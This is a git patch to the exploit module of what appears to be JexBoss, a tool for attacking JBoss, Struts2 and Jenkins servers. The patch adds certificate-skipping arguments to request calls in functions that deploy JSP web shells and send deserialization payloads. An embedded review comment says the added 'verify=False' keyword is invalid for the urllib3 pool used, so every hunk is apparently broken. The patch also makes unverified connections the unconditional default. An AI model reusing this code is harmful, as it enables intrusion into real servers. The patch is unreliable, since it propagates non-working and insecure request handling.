From 9e71cf6bd9ff42f53cc349a147cbb877a7c1e7e4 Mon Sep 17 00:00:00 2001 From: Robbie Date: Fri, 8 Dec 2017 08:02:39 +0000 Subject: [PATCH] Update _exploits.py when a server has a self signed SSL or you are accessing it via an IP it will fail to exploit. added a check to ignore the SSL certificate to allow exploitation. --- _exploits.py | 39 ++++++++++++++++++++------------------- 1 file changed, 20 insertions(+), 19 deletions(-) diff --git a/_exploits.py b/_exploits.py index 5533173..3806a1a 100644 --- a/_exploits.py +++ b/_exploits.py @@ -61,11 +61,11 @@ def get_successfully(url, path): headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Connection": "keep-alive", "User-Agent": jexboss.get_random_user_agent()} - r = gl_http_pool.request('GET', url + path, redirect=False, headers=headers) + r = gl_http_pool.request('GET', url + path, redirect=False, headers=headers, verify=False) result = r.status if result == 404: sleep(7) - r = gl_http_pool.request('GET', url + path, redirect=False, headers=headers) + r = gl_http_pool.request('GET', url + path, redirect=False, headers=headers, verify=False) result = r.status return result @@ -100,11 +100,11 @@ def exploit_struts2_jakarta_multipart(url,cmd, cookies): headers['Content-Type'] = content_type if cookies is not None: headers['Cookie'] = cookies - r = gl_http_pool.request('GET', url, redirect=True, headers=headers) + r = gl_http_pool.request('GET', url, redirect=True, headers=headers, verify=False) if r.status == 404: headers['Content-Type'] = 'text/html' - r = gl_http_pool.request('GET', url, redirect=True, headers=headers) + r = gl_http_pool.request('GET', url, redirect=True, headers=headers, verify=False) if r.status == 200: return " Could not get command output. You need to set up an Authoritative DNS and try to get the\n" \ " output of the commands via DNS covert channel.\n" 
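Review bot: `verify=False` is the `requests` library's keyword, not urllib3's, and `gl_http_pool` looks like a urllib3 `PoolManager` here (`.urlopen(...)`, `r.status`, `r.data` and `r.getheader(...)` are its API), so the argument added to the two `gl_http_pool.request(...)` lines of this hunk does not relax certificate checking at all; urllib3 forwards unrecognised keywords through `urlopen` into the `HTTPResponse` constructor, where `verify` would most likely raise a `TypeError` for an unexpected keyword argument as soon as a response arrives. The same keyword is added in every other hunk of this patch (`@@ -100` through `@@ -884`), so all of them share the problem. In urllib3, certificate verification is a property of the pool, set where `gl_http_pool` is constructed (`cert_reqs='CERT_NONE'` on the `PoolManager`) rather than per request, and making it a single pool-level setting behind an explicit option — an unverified pool cannot tell the intended host from anything interposed on the path, so it should not be the unconditional default — replaces nineteen call-site edits with one. The `def` line of `get_successfully` lies above this hunk.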
@@ -149,7 +149,7 @@ def exploit_struts2_jakarta_multipart_v2(url,cmd, cookies): if cookies is not None: headers['Cookie'] = cookies - r = gl_http_pool.request('POST', url, redirect=True, headers=headers, body=body) + r = gl_http_pool.request('POST', url, redirect=True, headers=headers, body=body, verify=False) return str(r.data) ''' @@ -174,7 +174,7 @@ def exploit_jmx_console_main_deploy(url): headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Connection": "keep-alive", "User-Agent": jexboss.get_random_user_agent()} - gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers) + gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers, verify=False) return get_successfully(url, "/jexws4/jexws4.jsp") @@ -264,7 +264,7 @@ def exploit_jmx_console_file_repository(url): headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Connection": "keep-alive", "User-Agent": jexboss.get_random_user_agent()} - gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers) + gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers, verify=False) return get_successfully(url, "/jexws4/jexws4.jsp") 
@@ -404,12 +404,12 @@ def exploit_jmx_invoker_file_repository(url, version): "Connection": "keep-alive", "User-Agent": jexboss.get_random_user_agent()} - r = gl_http_pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload) + r = gl_http_pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload, verify=False) result = r.status if result == 401: jexboss.print_and_flush(" Retrying...") - gl_http_pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload) + gl_http_pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload, verify=False) return get_successfully(url, "/jexinv4/jexinv4.jsp") @@ -451,11 +451,11 @@ def exploit_web_console_invoker(url): "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2", "Connection": "keep-alive", "User-Agent": jexboss.get_random_user_agent()} - r = gl_http_pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload) + r = gl_http_pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload, verify=False) result = r.status if result == 401: jexboss.print_and_flush(" Retrying...") - gl_http_pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload) + gl_http_pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload, verify=False) return get_successfully(url, "/jexws4/jexws4.jsp") 
@@ -489,7 +489,7 @@ def exploit_servlet_deserialization(url, host, port, cmd, is_win, gadget, gadget "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2", "Connection": "keep-alive", "User-Agent": jexboss.get_random_user_agent()} - r = gl_http_pool.urlopen('POST', url, redirect=False, headers=headers, body=payload) + r = gl_http_pool.urlopen('POST', url, redirect=False, headers=headers, body=payload, verify=False) if r.status == 200: return 201 else: @@ -559,7 +559,7 @@ def exploit_application_deserialization(url, host, port, cmd, is_win, param, for else: # open initial page for get cookie - r = gl_http_pool.request('GET', url, redirect=True, headers=headers) + r = gl_http_pool.request('GET', url, redirect=True, headers=headers, verify=False) cookie = r.getheader('set-cookie') if cookie is not None: headers['Cookie'] = cookie @@ -573,7 +573,7 @@ def exploit_application_deserialization(url, host, port, cmd, is_win, param, for if param_content is None: redirect_link = get_html_redirect_link(str(r.data)) if redirect_link is not None: - r = gl_http_pool.request('GET', url + "/" + redirect_link, redirect=True, headers=headers) + r = gl_http_pool.request('GET', url + "/" + redirect_link, redirect=True, headers=headers, verify=False) param_content = get_serialized_obj_from_param(str(r.data), param) # if param to be exploited is not ViewState, get the current viewState @@ -642,7 +642,7 @@ def exploit_jenkins(url, host, port, cmd, is_win, gadget, show_payload): cli_ip = url.split('://')[1].split('/')[0].split(':')[0] else: cli_ip = url.split('/')[0].split(':')[0] - r = gl_http_pool.request('GET', url, redirect=True, headers=headers) + r = gl_http_pool.request('GET', url, redirect=True, headers=headers, verify=False) all_headers = r.getheaders() for h in all_headers: if 'CLI-Port' in h: 
@@ -863,7 +863,7 @@ def exploit_admin_console(url, jboss_login): "Connection": "keep-alive", "User-Agent": jexboss.get_random_user_agent()} - r = gl_http_pool.request('GET', url+"/admin-console/login.seam", headers=headers) + r = gl_http_pool.request('GET', url+"/admin-console/login.seam", headers=headers, verify=False) if r.getheader('set-cookie') is not None: headers['Cookie'] = r.getheader('set-cookie') @@ -884,15 +884,15 @@ def exploit_admin_console(url, jboss_login): jexboss.print_and_flush(GREEN + " * Info: Successfully logged in! Wait..." + ENDC) location = r.getheader('Location') conversation_id = location.split('=')[1] - r = gl_http_pool.request('GET', location, headers=headers) + r = gl_http_pool.request('GET', location, headers=headers, verify=False) if state == None: sleep(7) r = gl_http_pool.request('GET', url+"/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR" - "%29&conversationId="+conversation_id+"&conversationPropagation=end", headers=headers) + "%29&conversationId="+conversation_id+"&conversationPropagation=end", headers=headers, verify=False) conversation_id = str(int(conversation_id)+1) r = gl_http_pool.request('GET', url+"/admin-console/secure/resourceTypeSummary.seam?actionMethod=secure%2FresourceType" "Summary.xhtml%3AcreateContentBackedResourceAction.init%28%29&conversationId=" - + conversation_id, headers=headers) + + conversation_id, headers=headers, verify=False) state = get_viewstate_value(str(r.data)) headers['Content-Type'] = "multipart/form-data; boundary=---------------------------551367293438156646377323759" @@ -1897,3 +1897,4 @@ def shows_payload(payload, gadget_type): jexboss.print_and_flush(url_encode(payload)) jexboss.print_and_flush(GREEN + "------------------------------------------------------------\n" + ENDC) +